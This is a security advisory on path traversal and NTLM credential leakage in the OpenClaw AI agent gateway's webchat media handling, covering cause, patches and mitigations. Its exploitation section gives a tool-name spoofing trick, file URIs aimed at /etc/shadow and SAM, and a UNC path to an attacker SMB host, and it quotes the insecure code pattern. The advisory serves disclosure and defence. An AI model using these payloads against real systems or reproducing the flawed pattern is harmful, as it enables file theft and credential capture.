GHSA-mr34-9552-qr95: Arbitrary File Disclosure and NTLM Leak in OpenClaw Webchat Media Processing

The OpenClaw platform acts as a gateway and orchestration layer for AI agents and integrated external tools. Tools return payloads that the gateway formats into a webchat user interface. A core feature of this formatting pipeline involves parsing tool-result objects, which frequently contain embedded media such as audio or images specified via URI references.

OpenClaw implements a localRoots containment policy intended to restrict filesystem access to specific, authorized directories. The vulnerability exists within the buildWebchatAudioContentBlocksFromReplyPayloads function, which processes media URIs for base64 embedding. Prior to the patch, this function failed to validate that requested local files resided within the configured localRoots boundaries.

Compounding this path traversal flaw is a secondary identity confusion vulnerability (CWE-178). OpenClaw restricts local media passthrough to trusted, built-in tools. However, the validation logic used lowercase normalization to compare tool names. This permitted an attacker to register a client-side tool with a mixed-case name that collided with a built-in tool, bypassing the trust boundary entirely.

The fundamental root cause consists of two distinct implementation flaws interacting across the tool execution boundary. The first flaw is an Improper Limitation of a Pathname to a Restricted Directory (CWE-22). When the gateway encounters a file:// scheme in a tool reply, it directly passes the resolved path to filesystem APIs like fs.statSync and fs.readFileSync.

Because the function does not anchor the requested path against the localRoots array, any structurally valid absolute path is accepted. The Node.js fs module implicitly follows standard operating system path resolution rules. On Unix systems, this allows arbitrary absolute file paths. On Windows systems, the standard path resolution mechanism natively supports Universal Naming Convention (UNC) paths, which initiates the underlying SMB client stack.

The second flaw is an identity confusion issue during authorization (CWE-178). OpenClaw's security model assumes external plugins operate in a low-trust context and restricts access to sensitive gateway functions, such as media embedding, to built-in tools. The authorization check compared the incoming tool name using a string normalization function (e.g., toolName.toLowerCase() === 'web_search'). An attacker registering a tool named Web_Search successfully passes this check, inheriting the permissions of the built-in web_search component.

The vulnerable code path began in the gateway's payload processing logic, where external tools submitted base payloads. The implementation lacked strict URL parsing and containment verification.

// VULNERABLE PATTERN
function buildWebchatAudioContentBlocksFromReplyPayloads(payload) {
  const mediaUrl = payload.mediaUrl;
  if (mediaUrl.startsWith('file://')) {
    const filePath = new URL(mediaUrl).pathname;
    // Missing localRoots containment check here
    const data = fs.readFileSync(filePath);
    return Buffer.from(data).toString('base64');
  }
}

The remediation strategy implemented across commits 1470de5d3e0970856d86cd99336bb8ada3fe87da and 6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde introduces strict path normalizers. The ReplyMediaPathNormalizer class was added to sanitize the incoming ReplyPayload objects. Additionally, the assertLocalMediaAllowed function was integrated directly into the buildWebchatAudioContentBlocksFromReplyPayloads pipeline. This function strictly validates the fully resolved, canonicalized file path against the configured localRoots paths using strict prefix matching.

To address the identity confusion vulnerability, commit 52ef42302ead9e183e6c8810e0a04ee4ef8ae9fc refactored the trusted tool validation logic. The platform no longer normalizes tool names prior to validation. Instead, the implementation enforces exact-name anchoring, requiring a case-sensitive match against a predefined list of trusted raw names. This explicitly breaks the name-collision bypass.

Exploitation requires the attacker to provide a malicious skill, plugin, or agent payload to the target OpenClaw instance. The attacker must control the return values of a registered tool. The first step involves exploiting the name collision bypass by registering the malicious tool with a mixed-case variant of a built-in tool name, such as Web_Search.

Once the tool executes, it returns a crafted tool-result object containing a malicious mediaUrl. To achieve arbitrary file disclosure on Linux or Windows, the attacker supplies a local file URI (e.g., file:///etc/shadow or file:///C:/Windows/System32/config/SAM). The gateway processes this URI, reads the file via the underlying Node.js filesystem APIs, base64-encodes the content, and embeds it directly into the webchat UI output returned to the attacker.

To leak NTLM credentials on a Windows host, the attacker specifies a UNC path to an attacker-controlled SMB server (e.g., file:////attacker-ip.com/share/probe.mp3). When the Node.js fs module attempts to access this UNC path, the Windows operating system automatically initiates an outbound SMB connection. During the SMB negotiation and authentication phase, the host automatically transmits the NTLMv2 hash of the service account running the OpenClaw gateway.

The impact of this vulnerability encompasses severe loss of confidentiality. By exploiting the arbitrary file disclosure vector, an attacker obtains unrestricted read access to the local filesystem of the host running the OpenClaw gateway. This exposes sensitive configuration files, environment variables, hardcoded API keys, and internal database files. Such access frequently provides the necessary cryptographic material to escalate privileges or move laterally within the target infrastructure.

The NTLM credential leakage vector presents an alternative high-impact risk specifically for Windows environments. By forcing the gateway to authenticate to an external SMB listener, the attacker captures the NTLMv2 hash of the gateway process. The attacker then utilizes standard cryptographic tools to crack the hash offline or executes an SMB relay attack to gain unauthorized access to other network resources within the Active Directory domain.

The combination of these capabilities results in a CVSS 3.1 base score of 8.6, reflecting the high confidentiality impact and the low complexity of the attack. The attack vector is strictly network-based, requires no user interaction, and targets a foundational component of the OpenClaw security boundary.

The primary remediation is upgrading the OpenClaw npm package to version 2026.4.15 or later. The patched version properly enforces the localRoots confinement model via the assertLocalMediaAllowed function and blocks name-spoofing via exact-name anchoring. All three necessary commits are included in the 2026.4.15 stable release.

Organizations unable to immediately apply the patch must implement strict plugin authorization policies. Disabling the loading of unverified external plugins entirely prevents the initial access vector. Administrators should audit the active tool registry for any custom or client-supplied tools utilizing variations of built-in tool names.

To proactively mitigate the NTLM leakage vector on Windows environments, network administrators should restrict outbound SMB traffic. Implementing firewall rules that explicitly deny outbound connections on TCP ports 139 and 445 from the OpenClaw host to untrusted networks prevents external credential leakage, regardless of application-layer vulnerabilities.